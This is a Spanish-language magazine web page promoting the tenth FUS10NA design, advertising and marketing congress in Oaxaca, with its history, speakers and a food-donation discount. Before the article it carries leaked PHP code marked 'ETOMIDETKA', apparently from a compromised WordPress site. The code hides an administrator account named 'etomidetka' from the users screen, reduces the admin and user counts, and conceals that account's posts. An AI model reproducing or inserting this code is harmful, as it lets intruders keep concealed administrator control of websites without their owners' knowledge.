//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); | Revista Fusión Empresarial

En 2004 nace Fusión Creativa Agencia de Comunicación Integral con el objetivo de generar una mejor y mayor cultura en la Publicidad, añadiendo en ella las diferentes disciplinas como Mercadotecnia, Comunicación, Diseño Gráfico, Redes Sociales entre otras que han coadyuvando a interpretar de mejor forma la manera de hace crecer un negocio.

Fusión Creativa al día de hoy cuenta con 15 años de experiencia que lo avalan no solo como una compañía creativa y disruptiva, sino también como una empresa oaxaqueña con alcance nacional y global, ya que muchos de nuestros clientes se encuentran no solo en el Estado, sino en el interior del País y algunos más en el extranjero. Gracias a clientes como estos, que han reconocido y apostado por nuestro talento y pasión, hemos sido nominados en varias ocasiones como mejor agencia de Publicidad por la Revista Merca 2.0 (revista especializada en Publicidad, Comunicación y Medios a nivel nacional).

Un logro que se menciona fácil pero que lleva un gran esfuerzo y dedicación entre Clientes y Agencia. De ahí que en 2008 Fusión Creativa fundara y lanzara el primer Congreso de Diseño, Publicidad y Mercadotecnia en todo el sureste mexicano, debido a la falta de plataformas de dichas características para el sector empresarial de nuestras entidades circunvecinas, siendo todo un éxito, no solo por la cantidad de personas que ha logrado reunir, sino también por la talla de conferencistas internacionales que se han dado cita año con año.

FUSIONA ha presentado a más de 70 conferencistas de diferentes nacionalidades, más de 81 conferencias con un poco más de 4,860 horas de contenido especializado, 210 talleres logrando sumar 63,000 horas de información depurada, muchos amigos, sonrisas y buenos momentos que se ha vivido a lo largo de este tiempo, uniendo técnicas, metodologías, conocimiento, tendencias y formas de percepción, no solo con contenido dirigido a especialistas en estas ramas, sino también a emprendedores, empresarios y estudiantes con la finalidad de que crezcan personal, profesional y empresarialmente en un intercambio abierto de experiencias, puntos de vista y formas de mejorar los negocios, rescatando en todo momento el cliente como parte central de la ecuación y los nuevos modelos de comunicación de hoy en día.

En ésta décima edición hemos creado el mejor FUS10NA, que podríamos haber creado, ya que todos y cada uno de los temas seleccionados, fueron incluidos con el único objetivo de traer a Oaxaca, contenido relevante entorno a aumentar la rentabilidad de las empresas desde la perspectiva de la Publicidad, de ahí que estos diez años, traerán 10 conferencias totalmente disruptivas y tres cursos sumamente especializados para conocer más sobre Innovación desde las empresas, Redes Sociales y fotografía, de ahí que le compartamos con mucha emoción, el gran grupo de conferencistas de esta edición:

Tendremos 10 mentes creativas extraordinarias, dignos representantes del talento que existe en el mundo. Como invitados tendremos a Nacho Zuccarino cabeza creativa de google latam, Victor Alvarado estratega creavito de Facebook, Marco Colin ilustrador y directivo de AVIÓN, Luis Gaitán director ejecutivo de Uber Latam, Maria Fernanda Rocha y Jon Black, fundadores Blackbot, Mario Olvera experto en fotomontaje y retoque digital, Edoardo Chavarín Director Creativo, Diseñador gráfico y Ro Vázquez Landeta fundadora de eat like a local México.

Oaxaca se dice que es riqueza cultural, tradiciones, mestizaje, gastronomía, mezcal, historia prehispánica, música y folcklor pero también es; tierra de grandes seres humanos que hacen el bien común es por ello que Fusión Creativa ah desarrollado un Congreso con causa y nos unimos a la filosofía de Club Rotario que busca brindar servicio humanitario, así como la buena voluntad y paz, por ello Congreso FUS10NA propone contribuir a través de una reducción de costo en los accesos General y Vip a cambio de alimentos empaquetados como frijol y arroz, tomando de esta propuesta que 1 kilo de cualquiera de estos perecederos es equivalente a $100.00 limitado a 5 kilos por persona. Dicha colecta será recabada en la entrada del Congreso y tendrá por destino llegar a las personas de escasos recursos, madres solteras, comunidades indígenas entre otros, demostrando la empatía, solidaridad y cariño por nuestra sociedad oaxaqueña.

Conocemos la importancia de unir fuerzas entre empresas oaxaqueñas y colaborar en conjunto para el crecimiento de nuestro Estado, por eso agradecemos de manera estrecha a nuestros aliados Universidad Anáhuac Oaxaca, Expendio Tradición, Periódico el Imparcial, Aragón Soluciones por su apoyo y de la misma forma a nuestros patrocinadores Publihome, Texsu Oaxaca por sumarse a este gran proyecto y confiar firmemente en nosotros.

Registrate en: https://fusiona.mx/

14, 15 y 16 de NOVIEMBRE / Hotel Fortín Plaza Oaxaca.

Añadir Comentario